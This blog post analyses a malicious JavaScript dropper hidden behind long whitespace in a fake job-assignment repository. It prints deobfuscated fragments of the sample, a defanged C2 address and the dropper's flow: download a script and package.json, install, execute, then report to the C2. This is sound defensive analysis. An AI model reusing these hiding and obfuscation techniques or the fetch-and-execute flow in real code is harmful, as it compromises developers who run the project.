Suspicious Code Repository for Job Seeker (Part 1)

By | September 28, 2024

A WhatsApp group I belong to told me that an X.com user had almost become the victim of malicious code from a suspicious code repository. This post discusses what I did to uncover the details of the malicious obfuscated code inside that repository.

The story actually began with a crypto exchange getting hacked. It was the morning of September 11, 2024, and I was in the middle of a heavy week handling multiple external audits, when Cyvers Alerts reported on X that it had detected multiple suspicious transactions from INDODAX, the oldest crypto exchange in Indonesia. Three hours later, INDODAX announced that “they found potential indicators of security [sic]”. They were not even covering up the incident!

It was a bold move from the CEO: when he was interviewed by The Overpost, he said that the network was infiltrated via the compromised laptop of an employee who had been looking for a well-paid moonlighting job. Sharing the incident like this is a good move, because the other players in the industry can prepare for a similar incident: how to prevent it, how to detect it, and how to recover from it.

The search for a sample

Soon after I watched this interview, one of my friends told me that an X user, Hynzo, an Indonesian software engineer, had tweeted about almost being attacked by the same so-called malware. Hynzo was offered a freelance job with a “wow” salary, and one step of the selection process was a take-home assignment: fix a button in a web project posted on a public code repository.

Tweet from Hynzo

Luckily, Hynzo was skeptical of the offer. The project was cloned and executed in a virtual machine with Microsoft Defender installed. Hynzo said the project was suspicious because the task was to fix a button, but the button did not exist anywhere in the project. Then, while the project was running in the background, Microsoft Defender detected the malware Trojan:Python/Malgent.HNNA!MTB. Wow! This is what I’ve been looking for.

From Hynzoime https://x.com/hynzoime_/status/1837832189670838615/photo/1

Let’s hunt!

I visited the repo and searched everything for any information relevant to attack attribution. It is a little bit weird that the repo has only one single commit, created on September 7, 2024, and only one single branch. No PR, no tag.

The gap between the creation of the repo and the moment Hynzo ran the project is considerably short: only 3 days. Hynzo tweeted the story 12 days after the code was executed. By the day I started to observe the code, more than 15 days had passed since the repo was created, which is strange, because by then malware creators have usually deleted the servers and any other indicators of compromise to conceal their tracks.

So far, the timeline (in GMT+7) is:

2024-09-07 02:34:20 Suspicious Repo was committed for the first time
2024-09-10 23:49:xx Executed code was flagged by Hynzo's Microsoft Defender-ed VM
2024-09-11 05:08:xx Cyvers Alerts notified INDODAX about the suspicious transactions
2024-09-21 16:33:11 CEO INDODAX interview was aired
2024-09-22 19:26:xx Hynzo tweeted the story
2024-09-25 09:32:47 I cloned the repo

A quick search for any occurrence of an encrypted, encoded, or obfuscated payload turned up only one JS file, which contains a strange part at the very bottom of the file.

How did I do that? By using the command line in macOS to calculate the Shannon entropy. Many papers already discuss this number, which Claude Shannon introduced in 1948 as part of information theory. The TL;DR version is that entropy indicates the randomness of the information within a file. As you might remember, good encryption should make the sequence of bytes look random, that is, unpredictable. A low entropy, closer to 0, indicates highly predictable bytes, something like a regular ASCII text file, while a high entropy, closer to 8 (the maximum, in bits per byte), indicates an unpredictable byte sequence. As a rule of thumb in the digital forensics world, 0-5 is considered low entropy, 5-7 medium entropy, and >7 high entropy.
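To make the number concrete, here is a minimal sketch of the calculation in JavaScript (Node.js). It is not the ent tool used in this post, only the textbook formula H = -Σ p·log2(p) applied to byte frequencies, and the function name shannonEntropy is made up for illustration.

```javascript
// Shannon entropy of a byte sequence, in bits per byte (0 to 8).
function shannonEntropy(bytes) {
  if (bytes.length === 0) return 0;

  // Count how often each of the 256 possible byte values occurs.
  const counts = new Array(256).fill(0);
  for (const b of bytes) counts[b]++;

  // H = -sum(p * log2(p)) over the byte values that actually occur.
  let entropy = 0;
  for (const count of counts) {
    if (count === 0) continue;
    const p = count / bytes.length;
    entropy -= p * Math.log2(p);
  }
  return entropy;
}

// One repeated byte: perfectly predictable.
const repetitive = Buffer.from("aaaaaaaaaaaaaaaa");
// Every byte value exactly once: as unpredictable as a byte histogram gets.
const allBytes = Buffer.from(Array.from({ length: 256 }, (_, i) => i));

console.log(shannonEntropy(repetitive));
console.log(shannonEntropy(allBytes));
```

The first call lands at the bottom of the scale and the second at the top, which is the same 0 to 8 range that the thresholds above refer to.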

Key Takeaway #1:
Use the entropy number to identify suspicious files. It can produce false positives, but it is worth checking.

Hence, I calculated the entropy of the files in the cloned repo and printed it along with the file type (what we call the MIME type) and the filename. This is the zsh script that I used:

Zsh
find . -type f -exec sh -c 'mime=$(file --mime-type "$1" | awk "{print \$2}"); ent "$1" 2>/dev/null | grep -m 1 "Entropy =" | awk -v mime="$mime" -v file="$1" "{print \"\" \$3 \",\" mime \",\" file}"' _ {} \; > entropy.csv

Then I filtered the result to text files only, eliminating binary files such as pictures. To make it easier for the reader, I put it in a spreadsheet. In a real scenario, I simply filter it with grep. Here are the entropy numbers, sorted in descending order and filtered to source code only.
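If you prefer a script over a spreadsheet or grep, the same filter and sort can be sketched in JavaScript. This assumes the entropy,mime,path row layout that the zsh one-liner writes to entropy.csv. The function name rankTextFiles, the extra MIME allowlist, and the sample rows are all hypothetical; they are not the real scan results.

```javascript
// Parse "entropy,mime,path" rows and return the text-like files,
// highest entropy first.
function rankTextFiles(csv, extraTextTypes = ["application/javascript", "application/json"]) {
  return csv
    .split(/\r?\n/)
    .filter((row) => row.trim() !== "")
    .map((row) => {
      // Split on the first two commas only, so paths containing commas survive.
      const first = row.indexOf(",");
      const second = row.indexOf(",", first + 1);
      return {
        entropy: parseFloat(row.slice(0, first)),
        mime: row.slice(first + 1, second),
        file: row.slice(second + 1),
      };
    })
    .filter(({ entropy, mime }) =>
      !Number.isNaN(entropy) &&
      (mime.startsWith("text/") || extraTextTypes.includes(mime)))
    .sort((a, b) => b.entropy - a.entropy);
}

// Hypothetical rows, for illustration only.
const sample = [
  "7.912345,image/png,./public/logo.png",
  "4.803211,text/plain,./README.md",
  "5.641002,application/javascript,./src/app.js",
].join("\n");

console.log(rankTextFiles(sample).map((r) => `${r.entropy} ${r.file}`));
```

The picture is dropped because of its MIME type, and the remaining source files come out with the most random-looking one on top.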

That’s why the index.js under the socket folder was the first file I investigated. I opened the file, searched for strange parts, and found this: at the bottom there is a line with a very looooong run of spaces followed by a one-liner. So, if your editor does not have word wrap turned on and you do not scroll to the right, you will not see it.
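This hiding trick is easy to check for mechanically. The following is a rough sketch, not a tool used in this investigation: it flags any line where a long run of spaces or tabs is followed by more text. The function name findHiddenTails and the default threshold of 80 characters are assumptions, and a heavily indented but innocent line would also be flagged.

```javascript
// Flag lines where a long run of spaces or tabs is followed by more code,
// a cheap way to hide a payload beyond the right edge of the editor.
function findHiddenTails(source, minRun = 80) {
  const gap = new RegExp(`[ \\t]{${minRun},}\\S`);
  const hits = [];
  source.split(/\r?\n/).forEach((line, index) => {
    const match = gap.exec(line);
    if (!match) return;
    // The match ends on the first visible character after the gap.
    const start = match.index + match[0].length - 1;
    hits.push({
      line: index + 1,
      column: start + 1,
      preview: line.slice(start, start + 40),
    });
  });
  return hits;
}

// Harmless stand-in for the trick described above.
const visiblePart = "module.exports = app;";
const demo = [
  "const app = {};",
  visiblePart + " ".repeat(300) + "(function(){/* hidden */})();",
].join("\n");

console.log(findHiddenTails(demo));
```

Running it over every source file in a freshly cloned repo takes seconds, and it does not require executing anything from the repo.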

Deobfuscate it

The JavaScript code is obfuscated. To make it more readable, I beautified the code so that it has clear code blocks; most programming IDEs have this feature. Then I eliminated some of the confusing method calls and hexadecimal numbers, using the web-based JavaScript deobfuscator https://deobfuscate.io/

The earlier code blocks rotate the array into the correct order. This part is deliberately written so that it is very hard to analyze with static methods alone, so I mixed in dynamic code analysis too, and ignored the code and functions that are never invoked. JavaScript has the IIFE, or Immediately Invoked Function Expression: a function expression that is executed as soon as it is defined. You can see this example:

JavaScript
(function (ax, ay) {
  const aL = E, az = ax();
  while (true) {
    try {
      const aA = -parseInt(aL(408)) / 1 * (parseInt(aL(423)) / 2) + -parseInt(aL(416)) / 3 * (parseInt(aL(397)) / 4) + parseInt(aL(404)) / 5 * (-parseInt(aL(429)) / 6) + parseInt(aL(426)) / 7 * (parseInt(aL(411)) / 8) + parseInt(aL(428)) / 9 * (-parseInt(aL(415)) / 10) + -parseInt(aL(406)) / 11 * (parseInt(aL(399)) / 12) + parseInt(aL(407)) / 13;
      if (aA === ay) break; else az.push(az.shift());
    } catch (aB) {
      az.push(az.shift());
    }
  }
}(C, 564989));

It declares a function that accepts ax and ay as parameters and immediately executes it with ax = C and ay = 564989. Looking at this code structure, I noticed that E is a function that accepts a and b as parameters, but only a is processed. The parameter a is actually an array index with 397 added to it, so it is always 397 or bigger. For example, aL(408) translates to E(408) = C[408-397] = C[11], treating C as the array it returns. Here’s the function E that is referred to by the constant aL:

JavaScript
function E(a, b) {
  const c = C();
  return E = function (d, e) {
    d = d - 397;
    let f = c[d];
    return f;
  }, E(a, b);
}

While C is defined as a function that returns an array:

JavaScript
function C() {
  const aV = ["ZaG9tZWRpcg", "cm1TeW5j", "(((.+)+)+)+$", "10440710HzUsuL", "179904lrxukf", "from", "ZXhpc3RzU3luYw", "YcmVxdWVzdA", "cZXhlYw", "Z2V0", "bWtkaXJTeW5j", "830yUvaWs", "L2tleXM", "constructor", "14609iSZreQ", "zcGF0aA", "9AFctrk", "534RVeTvv", "base64", "cG9zdA", "d3JpdGVGaWxlU3luYw", "Zbm9kZTpwcm9jZXNz", "search", "caG9zdG5hbWU", "8hKoXZe", "aY2hpbGRfcHJvY2Vzcw", "277008nOiLfN", "join", "YcGxhdGZvcm0", "sqj", "toString", "60985KjIMeh", "s2DzOA8", "253WICxLE", "53648465kqCNNO", "2099HINhgV", "apply", "utf8", "344dXnhwp"];
  C = function () {
    return aV;
  };
  return C();
}

Here C returns an array with 39 elements. Before any rotation, invoking -parseInt(aL(408)) translates to -parseInt(C[11]) = -parseInt("830yUvaWs"). If you notice, JavaScript is a weakly typed language and parseInt is lenient: it parses the leading digits and returns 830. But if the element does not start with a number, even if it contains one, the result is NaN. For example, -parseInt("ZaG9tZWRpcg") is NaN. Hence, the IIFE above actually performs these steps:

  1. Parse integer values from the array elements and do the arithmetic defined by the operations.
  2. If the result of the arithmetic calculation equals 564989, stop the rotation.
  3. If the result of the arithmetic calculation is not equal to 564989, rotate the array by moving the very first element to the end.
  4. If the result of the arithmetic calculation is NaN (not a number), it cannot equal 564989 either, so the array is rotated in the same way.
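The steps above can be replayed safely outside the sample. The sketch below copies only the string table from C() and the checksum expression from the IIFE; the names table, OFFSET, TARGET, num and checksum are mine, and the rotation cap is an extra safety net that the sample does not have.

```javascript
// String table copied from C() in the sample, in its original order.
const table = [
  "ZaG9tZWRpcg", "cm1TeW5j", "(((.+)+)+)+$", "10440710HzUsuL", "179904lrxukf",
  "from", "ZXhpc3RzU3luYw", "YcmVxdWVzdA", "cZXhlYw", "Z2V0", "bWtkaXJTeW5j",
  "830yUvaWs", "L2tleXM", "constructor", "14609iSZreQ", "zcGF0aA", "9AFctrk",
  "534RVeTvv", "base64", "cG9zdA", "d3JpdGVGaWxlU3luYw", "Zbm9kZTpwcm9jZXNz",
  "search", "caG9zdG5hbWU", "8hKoXZe", "aY2hpbGRfcHJvY2Vzcw", "277008nOiLfN",
  "join", "YcGxhdGZvcm0", "sqj", "toString", "60985KjIMeh", "s2DzOA8",
  "253WICxLE", "53648465kqCNNO", "2099HINhgV", "apply", "utf8", "344dXnhwp",
];
const OFFSET = 397;    // subtracted from every index inside E()
const TARGET = 564989; // second argument of the IIFE

// Same lookup as aL(n), followed by the lenient parseInt.
const num = (n) => parseInt(table[n - OFFSET]);

// Same arithmetic as the expression assigned to aA in the IIFE.
function checksum() {
  return -num(408) / 1 * (num(423) / 2)
    + -num(416) / 3 * (num(397) / 4)
    + num(404) / 5 * (-num(429) / 6)
    + num(426) / 7 * (num(411) / 8)
    + num(428) / 9 * (-num(415) / 10)
    + -num(406) / 11 * (num(399) / 12)
    + num(407) / 13;
}

let rotations = 0;
while (checksum() !== TARGET) { // NaN never equals TARGET, so it also rotates
  if (rotations >= table.length) throw new Error("no rotation matches the target");
  table.push(table.shift());    // move the first element to the end
  rotations++;
}

console.log(rotations, table[417 - OFFSET], table[403 - OFFSET]);
// prints: 24 from toString
```

Once the loop stops, index 417 resolves to "from" and index 403 to "toString", which is what makes the later Buffer[aO(417)](...)[aO(403)](...) call readable.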

Going back to the IIFE above, I can tell that this function rotates the array into the order intended by the code creator. After 24 rotations, I can see the array go from its original order (on the left side) to the correct order (on the right side):

After the array has been rotated into the correct order, I saw this declaration, which I deobfuscated into the JavaScript lines below it.

JavaScript
O = ax => (s1 = ax.slice(1), Buffer[aO(417)](s1, I)[aO(403)](K));

// substitute the variables with their real values...
function O(ax) { let s1 = ax.slice(1); return Buffer["from"](s1, "base64")["toString"]("utf8"); }

// ... then convert it into more readable standard JavaScript
function O(ax) { let s1 = ax.slice(1); return Buffer.from(s1, "base64").toString("utf8"); }

Using the pattern of the array invocations, I noticed that most of the elements are base64-encoded strings, so I used CyberChef to help me decode them. This is the recipe, if you are wondering:

Notice that even with base64 decoding, only several elements decode to readable English. That’s because the others have one excess character at the beginning of the string: the function O(ax) deletes the first character and then performs the base64 decoding. After repeating the decoding this way, I found interesting keywords related to Node.js.

ò¨]—
child_process
Û¾ôÓÉΈ·Í
Žˆ§
platform
²¨
¶„­®)à
ëO|ä¨È1è
³`ó8
ÛÖ ,K
ç~¸óŽ¹’ 4
ÛO}ƒa
jše
º×ü
ߎ^xp
homedir
rmSync
×N8Ó½t5,¸
׿}ӉkÆé
~º&
existsSync
request
exec
get
mkdirSync
ó}2Rö–
/keys
r‰ì¶»œ¶Š
׎´ö$™­ä
path
ô\¶¹
ç~Uäï
m«ë
post
writeFileSync
node:process
±æ«r
hostname
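The two decoding passes can also be done without CyberChef. This is a small sketch under my own assumptions: decodeEntry and isReadable are hypothetical helpers, and "readable" here simply means printable ASCII, which can occasionally misfire on a short string that happens to decode cleanly.

```javascript
// Plain base64 decode.
const decode = (s) => Buffer.from(s, "base64").toString("utf8");
// Same idea as O(ax) in the sample: drop the first character, then decode.
const decodeSkippingFirst = (s) => decode(s.slice(1));
// Printable-ASCII check used to tell a real keyword from decoding garbage.
const isReadable = (s) => /^[\x20-\x7e]+$/.test(s);

// Try the plain decode first, then the skip-one-character variant.
function decodeEntry(entry) {
  const candidates = [decode(entry), decodeSkippingFirst(entry)];
  return candidates.find(isReadable) ?? null;
}

console.log(decodeEntry("cm1TeW5j"));    // rmSync (plain base64)
console.log(decodeEntry("L2tleXM"));     // /keys (plain base64)
console.log(decodeEntry("ZaG9tZWRpcg")); // homedir (one junk character first)
console.log(decodeEntry("YcmVxdWVzdA")); // request (one junk character first)
console.log(decodeEntry("from"));        // null, this entry is not encoded
```

Entries such as "from" are used as-is by the sample, which is why they come out as garbage in the decoded list and as null here.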

The readable entries in the decoded list are common keywords in Node.js, right? Go on. Still following me? I also noticed a function a0 as follows:

JavaScript
const a0 = () => {
  let ax = "MTQ3LjEyNCaHR0cDovLw4yMTQuMTI5OjEyNDQ=  ";
  for (var ay = "", az = "", aA = "", aB = "", aC = 0; aC < 10; aC++) ay += ax[aC], az += ax[10 + aC], aA += ax[20 + aC], aB += ax[30 + aC];
  return ay = ay + aA + aB, Q(az) + Q(ay);
};

If you decode the string ax directly as base64, you won’t get any useful string. You need to look at the for loop that follows, which splits ax into four 10-character chunks and reorders them. That gives you the correct strings "MTQ3LjEyNC4yMTQuMTI5OjEyNDQ=" and "aHR0cDovLw", which decode to hxxp://147[.]124.214.129:1244. I intentionally changed the protocol and added the square brackets to prevent the string from becoming an active link on your device. And with that I found an IoC to block in my network.
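Here is a sketch of that reordering, written so that it only prints the defanged form. It assumes that Q, which is not shown in this post, is a plain base64 decoder; rebuildC2 and defang are names I made up for the illustration.

```javascript
// Assumed behaviour of Q(): plain base64 decode.
const decode = (s) => Buffer.from(s, "base64").toString("utf8");

function rebuildC2(blob) {
  // Four consecutive 10-character chunks, matching ay, az, aA and aB in a0.
  const [ay, az, aA, aB] = [0, 10, 20, 30].map((i) => blob.slice(i, i + 10));
  // az holds the scheme; ay + aA + aB hold the host and port.
  // trim() drops the two padding spaces at the end of the blob.
  return decode(az) + decode((ay + aA + aB).trim());
}

// Defang in the same style as this post, so the output is not a live link.
const defang = (url) => url.replace("http", "hxxp").replace(".", "[.]");

const ax = "MTQ3LjEyNCaHR0cDovLw4yMTQuMTI5OjEyNDQ=  ";
console.log(defang(rebuildC2(ax)));
// prints: hxxp://147[.]124.214.129:1244
```

Nothing here touches the network; it only rearranges and decodes a string, which makes it safe to run on an analysis machine.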

Key Takeaway #2:
Searching for an IoC, or Indicator of Compromise, is not easy. Sometimes it is blatantly hardcoded in the body of the code; sometimes you need to do some dynamic analysis first. In this code, we found the IP address used to communicate with the C2 server (command and control server) after reordering and decoding the base64 string. But in other samples, the communication from the dropper or malicious code is only revealed or activated by certain events (e.g. a specific date, executing something, etc.) or certain criteria (e.g. a specific internal IP address, a specific processor type, specific strings in the system information, etc.). This IP address is one of the indicators: if your network is communicating with it, one of your endpoints is already in the initial stage of compromise.

Then the rest is simply following the instructions. Since I tested on Microsoft Windows, the homedir is the usual home directory of the Win32 shell environment. This homedir is the base folder where the malicious script saves the files from its C2 server.

The code sends a GET request to hxxp://147[.]124.214.129:1244/j/s2DzOA8 and saves the result as test.js. It then downloads another file with a GET request to hxxp://147[.]124.214.129:1244/p and saves it as package.json. The content of package.json is:

JavaScript
{
   "dependencies": {
      "child_process": "^1.0.2",
      "request": "^2.88.2",
      "crypto": "^1.0.1"
   }
}

The package.json file is then processed with the command npm i --silent. I believe this is to make sure that whatever dependencies/libraries test.js needs are installed. Then test.js is executed. After the execution is done, the script sends data using the POST method to hxxp://147[.]124.214.129:1244/keys, and the POST data is:

{
  ts: Date.now().toString(),
  type: 's2DzOA8',
  hid: 'cmp',
  ss: 'sqj',
  cc: 'require("node:process")["argv"][1]'
}

I’m guessing this tells the C2 server that the first step of execution was completed at a specific timestamp, that test.js has been downloaded, and which command/arguments were used to execute the first obfuscated code.

Key Takeaway #3:
Without understanding the obfuscated or encrypted payloads, do not directly execute the code, even in a VM. By executing the code above, your IP address is still recorded by the server. Beware that the malware creator can retaliate if they find out that the data posted to their server does not tally with what they expect, for example if the key cc above is empty.

In malware analysis, this obfuscated code is called a dropper. There is nothing special about it: no suspicious system calls, function calls, or routines that would be flagged by any EDR or AV installed on the victim’s laptop. I uploaded the obfuscated part to https://www.hybrid-analysis.com and the result was clean.

Then I wondered what is inside the test.js file. Stay tuned, as I will write about it in part 2.

Key Takeaway #4:
Without understanding the obfuscated or encrypted payloads, do not directly upload the code to public multi-AV sites such as VirusTotal, Hybrid-Analysis, etc. Once your code is uploaded and analyzed, it becomes a public sample that other premium customers can download and study. Imagine that the IoC inside the obfuscated code points to or detects only your ASN, your domain, your processors. Then your code will be publicly discussed under the headline: “The [put your organization here] is spear phished by a malware created by [put any attribution to malware creator here]”

So far, the timeline (in GMT+7) is:

2024-09-07 02:34:20 Suspicious Repo was committed for the first time
2024-09-10 23:49:xx Executed code was flagged by Hynzo's Microsoft Defender-ed VM
2024-09-11 05:08:xx Cyvers Alerts notified INDODAX about the suspicious transactions
2024-09-21 16:33:11 CEO INDODAX interview was aired
2024-09-22 19:26:xx Hynzo tweeted the story
2024-09-25 09:32:47 I cloned the repo
2024-09-25 11:06:22 I checked with hybrid-analysis.com
